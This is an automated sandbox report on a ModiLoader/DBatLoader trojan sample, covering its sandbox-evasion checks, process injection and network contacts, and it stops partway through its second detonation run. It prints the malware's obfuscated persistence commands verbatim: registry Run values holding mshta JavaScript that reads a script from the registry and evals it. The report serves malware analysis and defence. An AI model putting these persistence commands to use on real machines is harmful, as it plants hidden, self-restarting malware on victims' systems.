Malware Analysis Report

2024-08-06 14:39

Sample ID 240530-fstdrsff9y
Target 831ef50525451ce1804e77eef61cdf28_JaffaCakes118
SHA256 898d1131c18d09fe4812ecd669a7917dbc6cff5d646104b362c423e57237a1cb
Tags
modiloader evasion persistence trojan
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK Matrix

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

898d1131c18d09fe4812ecd669a7917dbc6cff5d646104b362c423e57237a1cb

Threat Level: Known bad

The file 831ef50525451ce1804e77eef61cdf28_JaffaCakes118 was found to be: Known bad.

Malicious Activity Summary

modiloader evasion persistence trojan

ModiLoader, DBatLoader

Checks for common network interception software

Looks for VirtualBox Guest Additions in registry

ModiLoader Second Stage

Adds policy Run key to start application

Looks for VMWare Tools registry key

Deletes itself

Checks BIOS information in registry

Maps connected drives based on registry

Adds Run key to start application

Unsigned PE

Modifies Internet Explorer settings

Suspicious behavior: MapViewOfSection

Suspicious use of WriteProcessMemory

Suspicious behavior: EnumeratesProcesses

MITRE ATT&CK Matrix V13

Initial Access
TA0001
Execution
TA0002
Persistence
TA0003
Boot or Logon Autostart Execution
T1547
Registry Run Keys / Startup Folder
T1547.001
Privilege Escalation
TA0004
Boot or Logon Autostart Execution
T1547
Registry Run Keys / Startup Folder
T1547.001
Defense Evasion
TA0005
Virtualization/Sandbox Evasion
T1497
Modify Registry
T1112
Credential Access
TA0006
Discovery
TA0007
Software Discovery
T1518
Query Registry
T1012
Virtualization/Sandbox Evasion
T1497
System Information Discovery
T1082
Peripheral Device Discovery
T1120
Lateral Movement
TA0008
Collection
TA0009
Exfiltration
TA0010
Command and Control
TA0011
Impact
TA0040
Resource Development
TA0042
Reconnaissance
TA0043

Analysis: static1

Detonation Overview

Reported

2024-05-30 05:08

Signatures

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral2

Detonation Overview

Submitted

2024-05-30 05:08

Reported

2024-05-30 05:11

Platform

win10v2004-20240426-en

Max time kernel

150s

Max time network

150s

Command Line

"C:\Users\Admin\AppData\Local\Temp\831ef50525451ce1804e77eef61cdf28_JaffaCakes118.exe"

Signatures

ModiLoader, DBatLoader

trojan modiloader

Checks for common network interception software

evasion

Looks for VirtualBox Guest Additions in registry

evasion
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Oracle\VirtualBox Guest Additions C:\Windows\SysWOW64\regsvr32.exe N/A

ModiLoader Second Stage

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Adds policy Run key to start application

persistence
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\ = "mshta javascript:wF9Laqc=\"P6raIih8DN\";Cz0=new%20ActiveXObject(\"WScript.Shell\");OI0ZQh8U=\"zviSXHmEK\";npXL8=Cz0.RegRead(\"HKLM\\\\software\\\\Wow6432Node\\\\4a6420cca6\\\\7e2c46ec\");SoCU6Mn=\"9pco\";eval(npXL8);BFWt2wC=\"Yj\";" C:\Windows\SysWOW64\regsvr32.exe N/A

Looks for VMWare Tools registry key

evasion
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\VMware, Inc.\VMware Tools C:\Windows\SysWOW64\regsvr32.exe N/A

Checks BIOS information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Windows\SysWOW64\regsvr32.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Windows\SysWOW64\regsvr32.exe N/A

Deletes itself

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\ = "mshta javascript:EN4mq0BROq=\"atpI\";Oz06=new%20ActiveXObject(\"WScript.Shell\");JQMTSU8=\"6vkK4gp\";x4T1Mp=Oz06.RegRead(\"HKLM\\\\software\\\\Wow6432Node\\\\4a6420cca6\\\\7e2c46ec\");Y7PgDPv=\"FiSLqj1E\";eval(x4T1Mp);C6OPeFPwq=\"0WKmt\";" C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ = "mshta javascript:xE3YFXe=\"c\";lO2=new%20ActiveXObject(\"WScript.Shell\");t3w9yote=\"W\";t7s2Ja=lO2.RegRead(\"HKCU\\\\software\\\\4a6420cca6\\\\7e2c46ec\");xBLLzo90h=\"whk7Xos4W\";eval(t7s2Ja);OFjug1d=\"CBD\";" C:\Windows\SysWOW64\regsvr32.exe N/A

Maps connected drives based on registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum C:\Windows\SysWOW64\regsvr32.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum\0 C:\Windows\SysWOW64\regsvr32.exe N/A

Modifies Internet Explorer settings

adware spyware
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION\iexplore.exe = "0" C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000\SOFTWARE\Microsoft\Internet Explorer\Main\FeatureControl C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000\SOFTWARE\Microsoft\Internet Explorer\International C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000\SOFTWARE\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000\SOFTWARE\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION\regsvr32.exe = "0" C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000\SOFTWARE\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION\iexplore.exe = "0" C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION\regsvr32.exe = "0" C:\Windows\SysWOW64\regsvr32.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\831ef50525451ce1804e77eef61cdf28_JaffaCakes118.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\831ef50525451ce1804e77eef61cdf28_JaffaCakes118.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A

Suspicious behavior: MapViewOfSection

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\831ef50525451ce1804e77eef61cdf28_JaffaCakes118.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\831ef50525451ce1804e77eef61cdf28_JaffaCakes118.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\831ef50525451ce1804e77eef61cdf28_JaffaCakes118.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1196 wrote to memory of 1668 N/A C:\Users\Admin\AppData\Local\Temp\831ef50525451ce1804e77eef61cdf28_JaffaCakes118.exe C:\Windows\splwow64.exe
PID 1196 wrote to memory of 1668 N/A C:\Users\Admin\AppData\Local\Temp\831ef50525451ce1804e77eef61cdf28_JaffaCakes118.exe C:\Windows\splwow64.exe
PID 1196 wrote to memory of 796 N/A C:\Users\Admin\AppData\Local\Temp\831ef50525451ce1804e77eef61cdf28_JaffaCakes118.exe C:\Windows\SysWOW64\regsvr32.exe
PID 1196 wrote to memory of 796 N/A C:\Users\Admin\AppData\Local\Temp\831ef50525451ce1804e77eef61cdf28_JaffaCakes118.exe C:\Windows\SysWOW64\regsvr32.exe
PID 1196 wrote to memory of 796 N/A C:\Users\Admin\AppData\Local\Temp\831ef50525451ce1804e77eef61cdf28_JaffaCakes118.exe C:\Windows\SysWOW64\regsvr32.exe
PID 796 wrote to memory of 1680 N/A C:\Windows\SysWOW64\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe
PID 796 wrote to memory of 1680 N/A C:\Windows\SysWOW64\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe
PID 796 wrote to memory of 1680 N/A C:\Windows\SysWOW64\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe
PID 1680 wrote to memory of 1600 N/A C:\Windows\SysWOW64\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe
PID 1680 wrote to memory of 1600 N/A C:\Windows\SysWOW64\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe
PID 1680 wrote to memory of 1600 N/A C:\Windows\SysWOW64\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe
PID 1680 wrote to memory of 1960 N/A C:\Windows\SysWOW64\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe
PID 1680 wrote to memory of 1960 N/A C:\Windows\SysWOW64\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe
PID 1680 wrote to memory of 1960 N/A C:\Windows\SysWOW64\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe

Processes

C:\Users\Admin\AppData\Local\Temp\831ef50525451ce1804e77eef61cdf28_JaffaCakes118.exe

"C:\Users\Admin\AppData\Local\Temp\831ef50525451ce1804e77eef61cdf28_JaffaCakes118.exe"

C:\Windows\splwow64.exe

C:\Windows\splwow64.exe 12288

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k PrintWorkflow -s PrintWorkflowUserSvc

C:\Windows\SysWOW64\regsvr32.exe

regsvr32.exe

C:\Windows\SysWOW64\regsvr32.exe

regsvr32.exe

C:\Windows\SysWOW64\regsvr32.exe

"C:\Windows\SysWOW64\regsvr32.exe"

C:\Windows\SysWOW64\regsvr32.exe

"C:\Windows\SysWOW64\regsvr32.exe"

Network

Country Destination Domain Proto
US 8.8.8.8:53 97.17.167.52.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 4.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 196.249.167.52.in-addr.arpa udp
US 24.145.189.198:80 tcp
CY 37.9.178.141:80 tcp
US 206.7.29.61:80 tcp
CN 114.113.189.204:80 tcp
US 16.153.137.75:80 tcp
US 68.99.251.78:80 tcp
CN 1.14.238.193:80 tcp
GB 31.74.23.200:80 tcp
US 7.105.195.110:80 tcp
N/A 100.102.231.112:80 tcp
BH 185.33.176.84:8080 tcp
US 65.85.42.85:8080 tcp
US 73.66.17.247:80 tcp
US 73.106.190.91:80 tcp
IN 3.7.4.208:80 tcp
US 8.8.8.8:53 208.4.7.3.in-addr.arpa udp
IN 3.7.4.208:80 3.7.4.208 tcp
US 199.68.116.2:80 tcp
RU 159.93.157.91:80 tcp
CN 61.242.193.1:80 tcp
US 16.160.223.134:80 tcp
US 154.4.234.144:80 tcp
US 38.22.197.255:80 tcp
US 8.8.8.8:53 157.123.68.40.in-addr.arpa udp
US 8.8.8.8:53 15.164.165.52.in-addr.arpa udp
GB 163.167.187.164:80 tcp
US 135.173.55.1:80 tcp
NL 94.213.157.108:80 tcp
DE 84.146.239.143:80 tcp
AU 152.98.206.48:80 tcp
GB 25.251.203.81:80 tcp
CN 122.89.154.185:443 tcp
US 184.100.99.176:80 tcp
US 40.185.39.23:80 tcp
US 215.138.251.152:8080 tcp
KR 27.181.41.245:80 tcp
US 207.203.205.160:80 tcp
FR 88.163.40.14:80 tcp
US 68.240.95.5:80 tcp
JP 160.194.96.208:80 tcp
US 150.240.109.111:8080 tcp
US 137.181.128.145:80 tcp
N/A 127.168.81.52:80 tcp
US 26.115.85.70:80 tcp
CN 110.56.160.238:80 tcp
CA 142.80.23.45:80 tcp
ID 125.164.199.146:80 tcp
SG 43.16.113.251:80 tcp
US 192.73.29.136:80 tcp
US 167.84.142.181:80 tcp
NO 84.208.94.27:80 tcp
TW 114.34.70.252:80 tcp
CN 110.240.64.68:80 tcp
US 17.42.104.133:80 tcp
GB 159.219.38.244:80 tcp
US 140.175.24.55:80 tcp
FR 82.124.104.25:8080 tcp
US 68.228.223.26:443 tcp
US 198.182.190.231:80 tcp
KR 211.177.218.31:80 tcp
CH 57.243.111.131:80 tcp
DE 146.140.249.15:80 tcp
N/A 10.10.23.206:80 tcp
CN 58.20.155.226:80 tcp
US 204.121.220.205:80 tcp
GB 195.58.85.42:80 tcp
FR 141.145.200.38:80 tcp
JP 59.84.25.245:443 tcp
CN 117.126.127.235:80 tcp
TW 218.34.247.55:80 tcp
US 209.211.80.89:80 tcp
PH 223.25.48.182:80 tcp
TW 111.242.184.161:80 tcp
US 48.201.1.62:80 tcp
US 30.233.137.72:80 tcp
US 28.213.221.11:80 tcp
JP 202.235.116.17:80 tcp
US 16.252.253.146:80 tcp
US 66.195.104.101:80 tcp
US 107.140.30.68:80 tcp
US 130.134.123.228:80 tcp
US 98.18.97.34:80 tcp
IT 217.221.18.178:80 tcp
RU 91.106.200.66:80 tcp
US 155.150.97.234:8080 tcp
ES 185.249.204.8:80 tcp
US 8.8.8.8:53 66.200.106.91.in-addr.arpa udp
US 108.119.107.229:80 tcp
EG 197.122.133.233:80 tcp
US 131.27.212.140:80 tcp
ZA 41.124.233.108:80 tcp
US 4.127.101.88:80 tcp
MA 196.122.92.168:80 tcp
US 68.11.176.144:80 tcp
US 9.171.105.229:80 tcp
US 45.29.18.40:80 tcp
US 169.250.153.74:80 tcp
CA 24.36.151.228:80 tcp
UA 95.135.64.156:80 tcp
JP 126.122.8.175:80 tcp
US 19.101.87.71:80 tcp
US 206.77.236.173:80 tcp
US 44.131.225.16:80 tcp
CZ 188.75.178.118:80 tcp
US 204.224.86.25:80 tcp
CN 171.89.246.79:80 tcp
CN 159.27.90.152:80 tcp
US 144.197.79.17:8080 tcp
US 68.199.116.29:80 tcp
BR 191.39.93.142:80 tcp
KR 223.59.189.28:80 tcp
CN 182.100.105.233:443 tcp
US 8.8.8.8:53 203.107.17.2.in-addr.arpa udp
JP 114.167.73.44:80 tcp
US 8.8.8.8:53 29.243.111.52.in-addr.arpa udp
US 73.65.105.217:8080 tcp
US 17.245.129.63:80 tcp
DE 141.18.176.201:80 tcp
ZA 197.215.208.96:80 tcp
NL 130.141.203.207:8080 tcp
US 156.128.164.129:443 tcp
DE 194.77.138.124:80 tcp
DE 217.233.107.115:80 tcp
DE 3.123.108.25:80 tcp
DK 185.17.219.31:8080 tcp
CN 122.95.62.119:80 tcp
US 65.89.209.106:80 tcp
UA 31.12.145.2:80 tcp
CZ 213.168.191.128:80 tcp
CO 190.61.222.254:80 tcp
US 52.151.185.94:80 tcp
CN 183.164.125.2:8080 tcp
CN 42.129.238.95:80 tcp
US 3.213.51.3:443 tcp
US 174.165.200.97:443 tcp
US 8.8.8.8:53 3.51.213.3.in-addr.arpa udp
BR 200.240.182.19:80 tcp
CH 57.241.72.168:80 tcp
CN 36.210.29.236:80 tcp
CN 42.214.124.116:80 tcp
TW 61.223.61.171:8080 tcp
CN 182.36.7.20:80 tcp
HK 202.72.3.131:8080 tcp
US 131.84.25.185:80 tcp
AU 160.206.93.164:80 tcp
US 139.249.164.122:80 tcp
US 96.95.241.240:80 tcp
VE 190.75.10.138:80 tcp
GB 88.96.52.175:80 tcp
CA 103.190.70.153:443 tcp
US 8.8.8.8:53 138.10.75.190.in-addr.arpa udp
US 9.134.174.41:80 tcp
US 124.252.67.154:80 tcp
DK 176.22.123.174:80 tcp
US 66.193.108.38:80 tcp
US 138.55.117.214:80 tcp
US 148.13.12.193:8080 tcp
CN 119.48.232.93:80 tcp
US 168.148.15.244:80 tcp
US 146.252.42.230:80 tcp
AU 161.143.252.78:80 tcp
US 184.191.221.196:80 tcp
KR 58.74.250.216:8080 tcp
US 96.158.7.178:80 tcp
US 206.235.163.11:80 tcp
FR 176.190.46.140:80 tcp
SG 43.70.136.183:80 tcp
RO 84.117.131.212:80 tcp
US 198.52.211.43:80 tcp
US 153.27.164.210:80 tcp
US 50.140.208.162:80 tcp
US 16.71.116.120:8080 tcp
SG 43.117.33.18:80 tcp
BR 201.91.77.69:80 tcp
PL 87.204.211.46:80 tcp
US 169.28.122.42:80 tcp
US 26.233.85.220:80 tcp
US 135.165.169.250:80 tcp
CN 43.226.34.203:80 tcp
US 138.171.254.72:8080 tcp
CN 49.71.108.216:80 tcp
US 216.247.232.208:80 tcp
CA 20.104.46.143:80 tcp
BR 189.30.37.4:80 tcp
DE 141.38.100.190:80 tcp
IT 31.156.41.96:8080 tcp
GB 25.140.34.222:80 tcp
US 12.172.223.104:80 tcp
KR 211.63.193.202:80 tcp
US 7.159.75.110:80 tcp
FR 193.54.120.103:80 tcp
US 52.249.196.241:80 tcp
NG 102.90.42.145:80 tcp
CH 57.254.9.88:80 tcp
US 167.22.233.115:80 tcp
US 30.41.106.45:80 tcp
US 75.28.148.111:80 tcp
N/A 24.154.93.237:8080 tcp
N/A 196.29.223.207:80 tcp

Files

memory/1196-0-0x00000000028A0000-0x00000000029A0000-memory.dmp

memory/1196-1-0x0000000002660000-0x0000000002661000-memory.dmp

memory/1196-2-0x00000000028A0000-0x00000000029A0000-memory.dmp

memory/1196-3-0x0000000000400000-0x0000000000478000-memory.dmp

memory/1196-5-0x00000000006D0000-0x000000000079A000-memory.dmp

memory/1196-6-0x00000000006D0000-0x000000000079A000-memory.dmp

memory/1196-9-0x00000000006D0000-0x000000000079A000-memory.dmp

memory/1196-8-0x00000000006D0000-0x000000000079A000-memory.dmp

memory/1196-7-0x00000000006D0000-0x000000000079A000-memory.dmp

memory/796-15-0x00000000002B0000-0x00000000002B9000-memory.dmp

memory/1196-10-0x00000000006D0000-0x000000000079A000-memory.dmp

memory/1196-17-0x0000000000400000-0x0000000000478000-memory.dmp

memory/796-18-0x00000000002B0000-0x00000000002B9000-memory.dmp

memory/796-20-0x00000000002B0000-0x00000000002B9000-memory.dmp

memory/796-21-0x0000000001200000-0x00000000012CA000-memory.dmp

memory/796-24-0x0000000001200000-0x00000000012CA000-memory.dmp

memory/796-23-0x0000000001200000-0x00000000012CA000-memory.dmp

memory/796-22-0x0000000001200000-0x00000000012CA000-memory.dmp

memory/796-25-0x0000000001200000-0x00000000012CA000-memory.dmp

memory/1680-32-0x00000000002B0000-0x00000000002B9000-memory.dmp

memory/796-26-0x0000000001200000-0x00000000012CA000-memory.dmp

memory/1680-36-0x00000000002B0000-0x00000000002B9000-memory.dmp

memory/1680-34-0x00000000002B0000-0x00000000002B9000-memory.dmp

memory/1680-37-0x0000000000E00000-0x0000000000ECA000-memory.dmp

memory/1680-39-0x0000000000E00000-0x0000000000ECA000-memory.dmp

memory/1680-41-0x0000000000E00000-0x0000000000ECA000-memory.dmp

memory/1680-42-0x0000000000E00000-0x0000000000ECA000-memory.dmp

memory/1680-48-0x0000000000E00000-0x0000000000ECA000-memory.dmp

memory/1680-50-0x0000000000E00000-0x0000000000ECA000-memory.dmp

memory/1680-49-0x0000000000E00000-0x0000000000ECA000-memory.dmp

memory/1680-47-0x0000000000E00000-0x0000000000ECA000-memory.dmp

memory/1680-46-0x0000000000E00000-0x0000000000ECA000-memory.dmp

memory/1680-45-0x0000000000E00000-0x0000000000ECA000-memory.dmp

memory/1680-44-0x0000000000E00000-0x0000000000ECA000-memory.dmp

memory/1680-43-0x0000000000E00000-0x0000000000ECA000-memory.dmp

memory/1680-40-0x0000000000E00000-0x0000000000ECA000-memory.dmp

memory/1680-38-0x0000000000E00000-0x0000000000ECA000-memory.dmp

memory/1680-51-0x0000000000E00000-0x0000000000ECA000-memory.dmp

memory/1600-52-0x00000000002B0000-0x00000000002B9000-memory.dmp

memory/1600-55-0x00000000002B0000-0x00000000002B9000-memory.dmp

memory/1600-53-0x00000000002B0000-0x00000000002B9000-memory.dmp

memory/1600-56-0x0000000001000000-0x00000000010CA000-memory.dmp

memory/1600-60-0x0000000001000000-0x00000000010CA000-memory.dmp

memory/1600-61-0x0000000001000000-0x00000000010CA000-memory.dmp

memory/1600-59-0x0000000001000000-0x00000000010CA000-memory.dmp

memory/1600-58-0x0000000001000000-0x00000000010CA000-memory.dmp

memory/1600-57-0x0000000001000000-0x00000000010CA000-memory.dmp

memory/1680-62-0x0000000000E00000-0x0000000000ECA000-memory.dmp

memory/1680-63-0x0000000000E00000-0x0000000000ECA000-memory.dmp

memory/1960-64-0x00000000002B0000-0x00000000002B9000-memory.dmp

memory/1960-65-0x00000000002B0000-0x00000000002B9000-memory.dmp

memory/1960-67-0x00000000002B0000-0x00000000002B9000-memory.dmp

memory/1960-68-0x0000000001000000-0x00000000010CA000-memory.dmp

Analysis: behavioral1

Detonation Overview

Submitted

2024-05-30 05:08

Reported

2024-05-30 05:11

Platform

win7-20240215-en

Max time kernel

150s

Max time network

150s

Command Line

"C:\Users\Admin\AppData\Local\Temp\831ef50525451ce1804e77eef61cdf28_JaffaCakes118.exe"

Signatures

ModiLoader, DBatLoader

trojan modiloader

Checks for common network interception software

evasion

Looks for VirtualBox Guest Additions in registry

evasion
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Oracle\VirtualBox Guest Additions C:\Windows\SysWOW64\regsvr32.exe N/A

ModiLoader Second Stage

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Adds policy Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\ = "mshta javascript:RKK3rR5F=\"XTc3U77RR\";Aj7=new%20ActiveXObject(\"WScript.Shell\");rpInQ76k=\"Z0KlWDA\";w0mrw8=Aj7.RegRead(\"HKLM\\\\software\\\\Wow6432Node\\\\4473aafa5e\\\\6ffbda80\");RPavU8dO=\"S\";eval(w0mrw8);Jymj6VjI=\"Uv3jWfYp\";" C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run C:\Windows\SysWOW64\regsvr32.exe N/A

Looks for VMWare Tools registry key

evasion
Description Indicator Process Target
